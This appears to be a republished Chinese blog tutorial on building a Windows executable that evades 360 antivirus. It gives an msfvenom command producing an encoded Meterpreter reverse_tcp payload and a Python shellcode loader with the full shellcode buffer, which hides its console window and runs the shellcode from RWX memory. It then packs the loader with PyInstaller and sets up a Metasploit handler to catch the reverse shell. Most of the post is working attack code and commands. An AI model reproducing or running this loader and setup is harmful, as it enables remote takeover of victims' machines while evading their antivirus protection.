Metasploit+python生成免杀exe过360杀毒
Posted
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Metasploit+python生成免杀exe过360杀毒相关的知识,希望对你有一定的参考价值。
Metasploit+python生成免杀exe过360杀毒
1在kali下生成一个反弹的msf的python脚本,命令如下:
msfvenom -p windows/meterpreter/reverse_tcp LPORT=443 LHOST=192.1681.102 -e x86/shikata_ga_nai -i 11 -f py -o /opt/bk.py
2.拷贝出bk.py到window32系统进行修改,修改如下(这里的红色标注是修改增加的代码,其他不变)
from ctypes import * import ctypes buf = "" buf += "\\xbb\\x7a\\x62\\x0a\\x22\\xdb\\xc9\\xd9\\x74\\x24\\xf4\\x58\\x29" buf += "\\xc9\\xb1\\x97\\x31\\x58\\x15\\x03\\x58\\x15\\x83\\xe8\\xfc\\xe2" buf += "\\x8f\\xdc\\x50\\xbc\\x22\\x5d\\xbf\\x0c\\x65\\xe9\\x1b\\x79\\xcd" buf += "\\x39\\xad\\x30\\x7c\\x0c\\x5d\\x21\\xfd\\x87\\x61\\x46\\x2b\\xc8" buf += "\\x35\\xc0\\x38\\x81\\xbf\\xd5\\xb9\\xd7\\x14\\x0c\\xcb\\x00\\x79" buf += "\\x12\\x5d\\xd0\\xb1\\xee\\xfe\\x06\\x1d\\x51\\x8a\\x92\\x29\\xd2" buf += "\\xa4\\x4c\\xd0\\x08\\x22\\xdc\\x4f\\x24\\xb2\\x2b\\x2b\\xda\\x00" buf += "\\x5f\\xa3\\x1d\\x01\\xfe\\xe9\\xf2\\x62\\xeb\\xa7\\x46\\x63\\xce" buf += "\\xac\\x45\\xe4\\x8b\\xa1\\xa3\\x85\\x14\\xe1\\x1e\\x06\\xa7\\x6e" buf += "\\x7a\\x03\\xe7\\x05\\xd2\\x41\\x32\\x24\\x3c\\x48\\x72\\xf2\\x57" buf += "\\x0f\\x58\\x58\\x5c\\xf6\\xd5\\x0f\\x5b\\x6b\\xca\\x34\\xdd\\x5d" buf += "\\xe0\\x62\\x5a\\xc2\\xde\\x3d\\xdc\\xb3\\xf0\\x3e\\x78\\x31\\x90" buf += "\\x6c\\x5f\\x58\\xee\\x84\\xb0\\x30\\x87\\x60\\xec\\x58\\x25\\xad" buf += "\\x4a\\x6b\\xc6\\xb7\\xd8\\x70\\xb8\\x2f\\xc8\\xd9\\xcf\\xec\\x10" buf += "\\xcb\\x67\\x90\\xf2\\xdf\\xf2\\x4a\\xf3\\x23\\xf6\\xd1\\x12\\xa5" buf += "\\xfb\\x10\\xa9\\x56\\x4e\\xd0\\xdc\\x10\\x21\\x1d\\xb5\\x58\\x17" buf += "\\xe1\\x6d\\x69\\x74\\xc7\\xac\\x58\\x1a\\xc9\\xf7\\x00\\xf8\\x54" buf += "\\x76\\x05\\x6d\\xd4\\x9e\\x9c\\x22\\xdb\\x0f\\xa9\\xfa\\xe3\\x8b" buf += "\\x8e\\x1a\\x1f\\x60\\xdb\\xbe\\xef\\x2f\\x73\\xa5\\x42\\x02\\x93" buf += "\\x89\\x0f\\x42\\xfa\\xae\\xb9\\x9b\\xec\\xe2\\x53\\x56\\x38\\x51" buf += "\\x45\\x6f\\xb8\\xd2\\xff\\x3a\\x73\\x44\\xe4\\x38\\x38\\xf2\\x28" buf += "\\x76\\xf0\\xca\\x34\\x80\\x35\\x55\\x83\\xad\\x29\\x23\\x8a\\xca" buf += "\\x07\\xcf\\x88\\x30\\x15\\x2e\\xc0\\x99\\x1e\\xdd\\xb6\\xbb\\x49" buf += "\\x92\\x1e\\x9a\\xdd\\xcf\\x58\\xe9\\x84\\x66\\x3d\\x38\\xfc\\x28" buf += "\\x99\\xa4\\x19\\x09\\xe6\\x1c\\xf5\\xad\\x4f\\xa1\\x81\\xbf\\x51" buf += "\\x3d\\x0b\\x9e\\x27\\x60\\x20\\x7d\\x59\\x6e\\x82\\x7c\\x25\\x5c" buf += "\\x4e\\x34\\x25\\xed\\xc3\\xb1\\x45\\x02\\x92\\x75\\xf5\\x11\\xa5" buf += "\\x54\\xdc\\x1b\\x6f\\x9b\\x56\\xd2\\xb5\\x80\\x66\\xcf\\xe1\\x61" buf += "\\xd1\\x01\\xe4\\x31\\x52\\xd9\\x5b\\x01\\x37\\x29\\xa8\\xef\\xc8" buf += "\\x53\\x9b\\x1c\\x47\\x30\\x9e\\xe4\\x6a\\xda\\xb3\\xd5\\xfd\\xf5" buf += "\\xb8\\x13\\xbc\\x92\\xbb\\xb4\\x82\\x70\\x02\\xad\\xef\\x3b\\x70" buf += "\\xf4\\x98\\x84\\x31\\x52\\x97\\x60\\x2b\\x2e\\x84\\x9b\\x7f\\xb7" buf += "\\x30\\x85\\x58\\xef\\x8c\\x95\\xa0\\x56\\x2f\\xef\\x20\\x61\\x0d" buf += "\\x94\\x66\\xbf\\xa7\\xd0\\x71\\x56\\x52\\x82\\xb1\\xa0\\x19\\xe4" buf += "\\x7e\\xd9\\x90\\x96\\x2b\\x16\\xea\\x4c\\xde\\xcd\\x05\\x23\\x6e" buf += "\\xc2\\x4b\\xc0\\x68\\x1b\\xba\\xc1\\x1d\\xca\\x26\\x74\\xd1\\x92" buf += "\\x4e\\xd3\\x70\\x8a\\x43\\x41\\xbe\\x59\\xf1\\x20\\x33\\x89\\xb9" buf += "\\x2b\\xdb\\x9a\\x0f\\xad\\x8d\\x80\\x4c\\x78\\x52\\xe7\\x0a\\xf7" buf += "\\x47\\xd8\\x5c\\x0c\\x3c\\xd4\\x0d\\x3d\\xe7\\xbd\\x2d\\x22\\xb1" buf += "\\x37\\x0a\\xd9\\x5e\\xf2\\xd5\\xd2\\x56\\xe0\\x56\\x1c\\x42\\xc3" buf += "\\x75\\x92\\x55\\x7c\\x86\\x6a\\xb4\\xcd\\x3a\\xce\\x4d\\xea\\x4f" buf += "\\xa4\\x31\\xc6\\xe0\\x16\\x27\\xa5\\xf4\\x9d\\x79\\x5e\\xfc\\x60" buf += "\\xeb\\xef\\x35\\x33\\x6e\\x5b\\x6d\\xec\\x8f\\x9b\\x1e\\xb1\\xf6" buf += "\\x35\\xeb\\x1f\\x3b\\xab\\x99\\x9a\\x34\\x2a\\xf8\\x25\\x38\\xba" buf += "\\x40\\xe9\\xb0\\x51\\xbc\\xdf\\x60\\x16\\x62\\xc3\\x63\\x64\\xbd" buf += "\\xb5\\x28\\xf6\\x4c\\x71\\xd2\\x01\\x74\\x11\\xf0\\xd7\\xcd\\x4f" buf += "\\x34\\xad\\xc2\\x65\\x4c\\xeb\\x78\\xc1\\xbf\\xba\\x80\\x6c\\x46" buf += "\\x6a\\x15\\x15\\x03\\x5e\\x8d\\x65\\x8e\\x69\\x89\\x29\\x7f\\x67" buf += "\\xea\\xc1\\x6b\\x62\\xb0\\xd4" #libc = CDLL(‘libc.so.6‘) PROT_READ = 1 PROT_WRITE = 2 PROT_EXEC = 4 def executable_code(buffer): buf = c_char_p(buffer) size = len(buffer) addr = libc.valloc(size) addr = c_void_p(addr) if 0 == addr: raise Exception("Failed to allocate memory") memmove(addr, buf, size) if 0 != libc.mprotect(addr, len(buffer), PROT_READ | PROT_WRITE | PROT_EXEC): raise Exception("Failed to set protection on buffer") return addr VirtualAlloc = ctypes.windll.kernel32.VirtualAlloc VirtualProtect = ctypes.windll.kernel32.VirtualProtect shellcode = bytearray(buf) whnd = ctypes.windll.kernel32.GetConsoleWindow() if whnd != 0: if 666==666: ctypes.windll.user32.ShowWindow(whnd, 0) ctypes.windll.kernel32.CloseHandle(whnd) print ".................................."*666 memorywithshell = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40)) buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode) old = ctypes.c_long(1) VirtualProtect(memorywithshell, ctypes.c_int(len(shellcode)),0x40,ctypes.byref(old)) ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(memorywithshell), buf, ctypes.c_int(len(shellcode))) shell = cast(memorywithshell, CFUNCTYPE(c_void_p)) print "Code By Luan" shell()
3.在windowsx86上安装支持python的环境,下载pywin32 解压运行,一直点下一步就可以了
4.然后下载支持将python生成exe的软件pyinstall ,解压然后执行以下命令:
D:\\miansha\\pyinstaller-2.0>python PyInstaller.py --console --onefile bk.py
注意这里不要有中文路径,否则会出错
5.执行命令后会在d:\\pyinstaller-2.0\\bk\\dist目录生成bk.exe
6.这里我将在windowsx86上安装最新的360杀毒软件,进行查杀测试
7.然后在kali下启动msf,然后执行以下命令:
use exploit/multi/handler set lhost 192.168.1.102 set lport 443 set PAYLOAD windows/meterpreter/reverse_tcp exploit
8.然后在windowsx86系统上执行bk.exe,最终在msf反弹出meterprer 出来:
以上是关于Metasploit+python生成免杀exe过360杀毒的主要内容,如果未能解决你的问题,请参考以下文章
[源码]Python免杀ShellCode加载器(Cobaltstrike/Metasploit)